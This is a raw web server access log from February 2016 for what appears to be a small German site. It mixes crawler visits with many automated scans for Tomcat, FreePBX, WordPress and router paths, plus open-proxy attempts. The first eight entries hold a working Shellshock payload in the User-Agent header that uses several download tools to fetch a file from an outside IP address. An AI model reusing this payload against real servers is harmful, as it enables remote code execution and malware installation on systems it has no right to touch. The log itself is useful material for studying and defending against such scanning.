47.88.12.235 - - [25/Feb/2016:07:16:00 +0100] "GET /index.cgi HTTP/1.1" 404 314 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
47.88.12.235 - - [25/Feb/2016:07:16:06 +0100] "GET /cgi-bin/php HTTP/1.1" 404 316 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
47.88.12.235 - - [25/Feb/2016:07:16:12 +0100] "GET /cgi-bin/php5-cli HTTP/1.1" 404 321 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
47.88.12.235 - - [25/Feb/2016:07:16:18 +0100] "GET /phppath/cgi_wrapper HTTP/1.1" 404 324 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
47.88.12.235 - - [25/Feb/2016:07:16:24 +0100] "GET /phppath/php HTTP/1.1" 404 316 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
47.88.12.235 - - [25/Feb/2016:07:16:30 +0100] "GET /cgi-sys/php5 HTTP/1.1" 404 317 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
47.88.12.235 - - [25/Feb/2016:07:16:36 +0100] "GET /cgi-bin/php.fcgi HTTP/1.1" 404 321 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
47.88.12.235 - - [25/Feb/2016:07:16:42 +0100] "GET /cgi-bin/index.cgi HTTP/1.1" 404 322 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
64.246.165.210 - - [25/Feb/2016:07:59:57 +0100] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.210 - - [25/Feb/2016:07:59:57 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizlpreiseberlin-2zb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
157.55.39.68 - - [25/Feb/2016:08:15:16 +0100] "GET /berufsbekleidung/ HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
188.95.72.20 - - [25/Feb/2016:08:22:43 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
188.95.72.20 - - [25/Feb/2016:08:22:43 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
188.95.72.20 - - [25/Feb/2016:08:22:45 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
188.95.72.20 - - [25/Feb/2016:08:22:45 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
188.95.72.20 - - [25/Feb/2016:08:22:46 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
188.95.72.20 - - [25/Feb/2016:08:22:46 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
188.95.72.20 - - [25/Feb/2016:08:22:47 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
188.95.72.20 - - [25/Feb/2016:08:22:47 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
115.231.222.14 - - [25/Feb/2016:08:27:42 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.8073250644978390 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
60.209.5.30 - - [25/Feb/2016:08:57:16 +0100] "GET /backoffice/ajax/ajax_b_calendar.asp?D_UID=admin HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0"
216.145.11.94 - - [25/Feb/2016:09:08:56 +0100] "GET /robots.txt HTTP/1.0" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.11.94 - - [25/Feb/2016:09:08:56 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizllieferantberlin-69b.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.161.190 - - [25/Feb/2016:10:24:23 +0100] "GET /robots.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.161.190 - - [25/Feb/2016:10:24:23 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizlberlin-ufb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
115.231.222.14 - - [25/Feb/2016:10:39:33 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.3340785214797928 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
64.246.165.150 - - [25/Feb/2016:10:57:48 +0100] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.150 - - [25/Feb/2016:10:57:48 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--premiuml-t4a.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
5.9.73.227 - - [25/Feb/2016:11:23:20 +0100] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
5.9.73.227 - - [25/Feb/2016:11:23:22 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
169.229.3.91 - - [25/Feb/2016:11:51:26 +0100] "~\xba\x8aj\xa4C\x13S\xff\x01\xd9-\x81Eu\x95\xdcV)\x03\xe1\xfb@\xa7\xa9\xe0u 24@" 400 329 "-" "-"
60.209.5.30 - - [25/Feb/2016:12:14:27 +0100] "GET /backoffice/ajax/ajax_b_calendar.asp?D_UID=admin HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0"
185.130.5.146 - - [25/Feb/2016:12:30:51 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.146 - - [25/Feb/2016:12:31:02 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.146 - - [25/Feb/2016:12:31:04 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.146 - - [25/Feb/2016:12:31:05 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.146 - - [25/Feb/2016:12:31:06 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.146 - - [25/Feb/2016:12:31:12 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
64.246.165.170 - - [25/Feb/2016:12:42:16 +0100] "GET /robots.txt HTTP/1.0" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.170 - - [25/Feb/2016:12:42:17 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizllieferungen-pwb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
115.231.222.14 - - [25/Feb/2016:12:52:09 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0613000898309406 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
85.25.43.94 - - [25/Feb/2016:13:56:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
85.25.43.94 - - [25/Feb/2016:13:56:01 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
85.25.43.94 - - [25/Feb/2016:13:56:02 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
222.186.58.169 - - [25/Feb/2016:14:07:05 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
222.186.58.169 - - [25/Feb/2016:14:07:06 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
222.186.58.169 - - [25/Feb/2016:14:07:06 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
222.186.58.169 - - [25/Feb/2016:14:07:08 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
222.186.58.169 - - [25/Feb/2016:14:07:15 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
222.186.58.169 - - [25/Feb/2016:14:07:15 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
222.186.58.169 - - [25/Feb/2016:14:07:15 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
111.248.116.238 - - [25/Feb/2016:14:31:03 +0100] "CONNECT vip163mx01.mxmail.netease.com:25 HTTP/1.0" 405 358 "-" "-"
115.231.222.14 - - [25/Feb/2016:15:03:04 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.2771728761576632 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [25/Feb/2016:15:03:04 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9380218548409509 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [25/Feb/2016:15:03:04 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0280534906266340 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
60.209.5.30 - - [25/Feb/2016:16:18:39 +0100] "GET /backoffice/ajax/ajax_b_calendar.asp?D_UID=admin HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0"
51.255.65.80 - - [25/Feb/2016:16:27:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
104.192.0.18 - - [25/Feb/2016:17:09:36 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:10:01 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:11:48 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:11:48 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
115.231.222.14 - - [25/Feb/2016:17:14:35 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.5180175612477042 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [25/Feb/2016:17:14:36 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7511192964659754 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [25/Feb/2016:17:14:38 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0349216577540274 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
104.192.0.18 - - [25/Feb/2016:17:15:06 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:15:06 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:21:44 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:21:44 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:34:52 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:34:52 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:46:18 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:47:59 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:49:12 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:51:20 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:51:20 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:54:40 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:17:58:06 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:01:38 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:01:58 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:01:58 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:11:54 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:15:41 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:17:45 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:19:31 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:20:09 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
60.209.5.30 - - [25/Feb/2016:18:20:50 +0100] "GET http-req HTTP/1.1" 400 330 "-" "Mozilla/5.0 zgrab/0.x"
104.192.0.18 - - [25/Feb/2016:18:21:53 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:23:40 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:25:26 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:30:35 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:32:15 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:40:19 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:43:59 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:44:50 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:18:46:37 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
1.171.249.194 - - [25/Feb/2016:19:14:42 +0100] "CONNECT 163mx01.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
104.192.0.18 - - [25/Feb/2016:19:14:42 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:19:16:43 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
115.231.222.14 - - [25/Feb/2016:19:26:17 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9619408185258223 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [25/Feb/2016:19:26:17 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0631411065176133 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [25/Feb/2016:19:26:17 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.3789633288509989 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
185.130.5.149 - - [25/Feb/2016:19:49:01 +0100] "GET /xmlrpc.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
66.249.78.50 - - [25/Feb/2016:20:16:06 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.57 - - [25/Feb/2016:20:16:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.9.63.149 - - [25/Feb/2016:20:16:38 +0100] "GET /robots.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
5.9.63.149 - - [25/Feb/2016:20:16:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
91.121.221.15 - - [25/Feb/2016:20:42:31 +0100] "GET /robots.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
91.121.221.15 - - [25/Feb/2016:20:42:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
104.192.0.18 - - [25/Feb/2016:20:45:03 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:20:47:40 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
104.192.0.18 - - [25/Feb/2016:20:53:15 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
60.209.5.30 - - [25/Feb/2016:21:00:24 +0100] "GET http-req HTTP/1.1" 400 330 "-" "Mozilla/5.0 zgrab/0.x"
104.192.0.18 - - [25/Feb/2016:21:04:50 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
66.249.78.44 - - [25/Feb/2016:21:10:33 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.44 - - [25/Feb/2016:21:10:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.198 - - [25/Feb/2016:21:28:49 +0100] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.109 - - [25/Feb/2016:21:28:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
60.209.5.30 - - [25/Feb/2016:21:30:04 +0100] "GET http-req HTTP/1.1" 400 330 "-" "Mozilla/5.0 zgrab/0.x"
104.192.0.18 - - [25/Feb/2016:21:31:20 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
115.231.222.14 - - [25/Feb/2016:21:37:14 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4412886129210057 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [25/Feb/2016:21:37:14 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4871853383971741 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [25/Feb/2016:21:37:14 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0518740786769217 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [25/Feb/2016:21:37:15 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4357768405015310 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
104.192.0.18 - - [25/Feb/2016:22:11:24 +0100] "GET /freepbx/admin/CHANGES HTTP/1.0" 404 326 "-" "-"
5.39.222.159 - - [25/Feb/2016:22:37:32 +0100] "GET /rom-0 HTTP/1.1" 404 310 "-" "Mozilla/5.0 zgrab/0.x"
115.231.222.14 - - [25/Feb/2016:23:47:46 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0710479166488904 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [25/Feb/2016:23:47:47 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7750662995189863 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
60.209.5.30 - - [26/Feb/2016:00:05:00 +0100] "GET http-req HTTP/1.1" 400 330 "-" "Mozilla/5.0 zgrab/0.x"
